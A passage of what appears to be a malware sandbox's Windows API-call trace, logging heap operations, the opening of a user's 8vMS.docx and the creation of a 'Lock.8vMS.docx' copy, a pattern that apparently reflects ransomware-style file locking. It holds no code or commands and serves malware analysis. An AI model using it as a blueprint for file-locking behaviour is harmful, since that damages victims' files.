(in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0260.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0260.911] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/8vMS.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8vms.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0260.912] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0260.912] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0260.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0260.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0260.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0260.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0260.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0260.913] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0260.913] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0260.913] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0260.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0260.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0260.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0260.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0260.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0260.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0260.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0260.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x249c7b0 [0260.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0260.914] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0260.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0260.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0260.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x3561010 [0260.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0260.914] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.8vMS.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.8vms.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0260.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0260.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0260.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0260.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0260.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0260.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0260.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.916] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0260.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0260.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0260.916] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0260.916] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0260.916] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0260.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0260.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0260.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0260.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0260.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0260.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0260.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0260.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0260.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0260.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0260.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0260.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0260.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0260.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0260.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0260.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0260.918] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0260.918] ReadFile (in: hFile=0x1f8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0xfd98, lpOverlapped=0x0) returned 1 [0260.921] ReadFile (in: hFile=0x1f8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0260.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0260.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0260.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xfd98) returned 0x24b7a48 [0260.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0260.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0260.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0260.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0260.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0260.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0260.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xfd98) returned 0x24c77e8 [0260.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0260.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.925] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0260.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0260.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xfd98) returned 0x24b7a48 [0260.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0260.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0260.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.926] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0260.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0260.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0260.926] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0260.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0260.927] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0260.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0260.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1868 [0260.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0260.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0260.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0260.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xfd98) returned 0x24b7a48 [0260.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0260.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1798 [0260.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0260.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c28 [0260.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0260.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0260.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0260.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0260.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0260.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0260.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0260.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0260.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0260.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0260.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0260.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0260.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xfd98) returned 0x24d7588 [0260.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0260.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0260.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0260.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0260.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0260.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0260.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0260.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0260.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0260.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0260.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0260.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0260.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0260.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0260.930] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0260.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0260.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0260.931] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0260.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0260.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0260.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0260.931] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0260.931] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0260.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) 